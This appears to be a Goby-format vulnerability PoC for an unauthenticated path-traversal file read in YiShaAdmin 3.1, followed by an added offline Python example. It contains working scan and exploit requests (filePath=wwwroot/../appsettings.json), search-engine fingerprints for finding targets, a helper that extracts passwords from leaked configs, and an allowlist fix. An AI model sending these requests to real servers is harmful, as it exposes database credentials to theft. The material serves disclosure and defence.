{ "Name": "YiShaAdmin 3.1 Arbitrary File Read", "Description": "

YiShaAdmin is a permission-management system built on .NET Core MVC. The code is easy to read and understand, and the interface is simple and clean.

The endpoint /admin/File/DownloadFile does not require authentication and does not confine the filePath parameter to a download directory. An attacker can send a path-traversal value such as wwwroot/../appsettings.json and read arbitrary files from the server, including appsettings.json, which holds the database connection string and password.

", "Product": "YiShaAdmin", "Homepage": "https://github.com/liukuo362573/YiShaAdmin", "DisclosureDate": "2022-03-23", "Author": "abszse", "FofaQuery": "body=\"/yisha/css/login.css\"", "GobyQuery": "body=\"/yisha/css/login.css\"", "Level": "2", "Impact": "

An unauthenticated attacker can read arbitrary files from the server, including configuration files such as appsettings.json that contain the database connection string and password.

", "References": [ "https://fofa.so/" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "appsettings.json", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/admin/File/DownloadFile?filePath=wwwroot/../appsettings.json&delete=0", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Logging", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/admin/File/DownloadFile?filePath=wwwroot/../{{{cmd}}}&delete=0", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "Tags": [ "Arbitrary File Download" ], "VulType": [ "Arbitrary File Download" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "7.5", "Translation": { "CN": { "Name": "YiShaAdmin Management System 3.1 Arbitrary File Read Vulnerability", "Product": "YiShaAdmin", "Description": "

YiShaAdmin is a permission-management system based on .NET Core MVC; the code is easy to read and understand, and the interface is simple and clean.

The endpoint /admin/File/DownloadFile does not require authentication and does not confine the filePath parameter to a download directory. An attacker can send a path-traversal value such as wwwroot/../appsettings.json and read arbitrary files from the server, including appsettings.json, which holds the database connection string and password.

", "Recommendation": "

Require authentication for /admin/File/DownloadFile.

Restrict the filePath parameter to an allowlist of permitted directories: resolve the requested path against the download root and reject any request (including ones using ../ or ..\) that resolves outside it.

For the fix, follow the project repository: https://github.com/liukuo362573/YiShaAdmin

", "Impact": "

An unauthenticated attacker can read arbitrary files from the server, including configuration files such as appsettings.json that contain the database connection string and password.

", "VulType": [ "Arbitrary File Download" ], "Tags": [ "Arbitrary File Download" ] }, "EN": { "Name": "YiShaAdmin 3.1 Arbitrary File Read", "Product": "YiShaAdmin", "Description": "

YiShaAdmin is a permission-management system built on .NET Core MVC. The code is easy to read and understand, and the interface is simple and clean.

The endpoint /admin/File/DownloadFile does not require authentication and does not confine the filePath parameter to a download directory. An attacker can send a path-traversal value such as wwwroot/../appsettings.json and read arbitrary files from the server, including appsettings.json, which holds the database connection string and password.

", "Recommendation": "

Require authentication for /admin/File/DownloadFile.

Restrict the filePath parameter to an allowlist of permitted directories: resolve the requested path against the download root and reject any request (including ones using ../ or ..\) that resolves outside it.

For the fix, follow the project repository: https://github.com/liukuo362573/YiShaAdmin

", "Impact": "

An unauthenticated attacker can read arbitrary files from the server, including configuration files such as appsettings.json that contain the database connection string and password.

", "VulType": [ "Arbitrary File Download" ], "Tags": [ "Arbitrary File Download" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }
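A worked example, added here and not part of the original PoC or the YiShaAdmin project: a small Python script that builds the same request the ScanSteps and ExploitSteps above send, applies the same response test (HTTP 200 and a body containing "Logging"), pulls credential-looking values out of a fetched appsettings.json, and contrasts the path resolution the PoC relies on with the allowlist check the Recommendation asks for. The directory layout (/app as content root, /app/wwwroot as download root), the sample appsettings.json body, the vulnerable-resolution model and all function names are constructed for the example; the script makes no network requests, and the project's own C# is not reproduced here.

```python
"""Offline reproduction of the YiShaAdmin DownloadFile checks plus the path
allowlist that would close the hole. Added example; the directory layout,
the sample body and every function name below are assumptions, not code
or configuration from the YiShaAdmin project."""
from __future__ import annotations

import json
import posixpath
from urllib.parse import urlencode

DOWNLOAD_ENDPOINT = "/admin/File/DownloadFile"
CONTENT_ROOT = "/app"            # assumed: where appsettings.json lives
DOWNLOAD_ROOT = "/app/wwwroot"   # assumed: the only tree the endpoint should serve

# Constructed stand-in for a leaked appsettings.json (not from a real host).
SAMPLE_BODY = """{
  "Logging": { "LogLevel": { "Default": "Information" } },
  "ConnectionStrings": {
    "DefaultConnection": "Server=db;Database=yisha;User Id=sa;Password=S3cret!;"
  },
  "AllowedHosts": "*"
}"""


def build_download_uri(file_path: str, delete: int = 0) -> str:
    """Request URI used by the PoC. The wwwroot/../ prefix steps out of the web
    root so file_path is resolved from the application directory. delete is
    kept at 0 as in the PoC; the name suggests a non-zero value removes the
    file after serving it (an assumption, which is exactly why it stays 0)."""
    query = urlencode(
        {"filePath": f"wwwroot/../{file_path}", "delete": delete}, safe="/"
    )
    return f"{DOWNLOAD_ENDPOINT}?{query}"


def response_indicates_vulnerable(status: int, body: str) -> bool:
    """Same test as the ScanSteps ResponseTest: HTTP 200 and 'Logging' in body."""
    return status == 200 and "Logging" in body


def find_secrets(body: str) -> list[tuple[str, str]]:
    """Walk a JSON document and return (dotted.key, value) for string leaves
    whose key or value looks like a credential. This is what makes the read
    worth it: an ASP.NET Core appsettings.json usually carries the connection
    string, password included."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    found: list[tuple[str, str]] = []

    def walk(node, path: str) -> None:
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, f"{path}.{key}" if path else key)
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")
        elif isinstance(node, str):
            haystack = f"{path} {node}".lower()
            if "password" in haystack or "pwd=" in haystack:
                found.append((path, node))

    walk(doc, "")
    return found


def vulnerable_resolve(requested: str) -> str:
    """Model of what the PoC relies on (assumed, not the project's code): the
    parameter is joined to the content root and '..' is honoured, so
    wwwroot/../appsettings.json lands on the real configuration file."""
    return posixpath.normpath(
        posixpath.join(CONTENT_ROOT, requested.replace("\\", "/"))
    )


def safe_resolve(requested: str) -> str | None:
    """Allowlist fix: resolve only under DOWNLOAD_ROOT and refuse anything
    that escapes it (traversal, absolute paths, the root itself). Backslashes
    are folded to '/' first because a Windows host treats both as separators."""
    candidate = posixpath.normpath(
        posixpath.join(DOWNLOAD_ROOT, requested.replace("\\", "/"))
    )
    if not candidate.startswith(DOWNLOAD_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    print(build_download_uri("appsettings.json"))
    print("vulnerable:", response_indicates_vulnerable(200, SAMPLE_BODY))
    print("secrets:", find_secrets(SAMPLE_BODY))
    print("unpatched path:", vulnerable_resolve("wwwroot/../appsettings.json"))
    print("patched path:", safe_resolve("wwwroot/../appsettings.json"))
    print("patched ../:", safe_resolve("../appsettings.json"))
```

With the allowlist in place the PoC's traversal string still resolves to a file, but only to /app/wwwroot/appsettings.json inside the download root, which does not exist; a bare ../appsettings.json, a backslash variant, or an absolute path is refused outright. Authentication on the endpoint is a separate control and should be added as well.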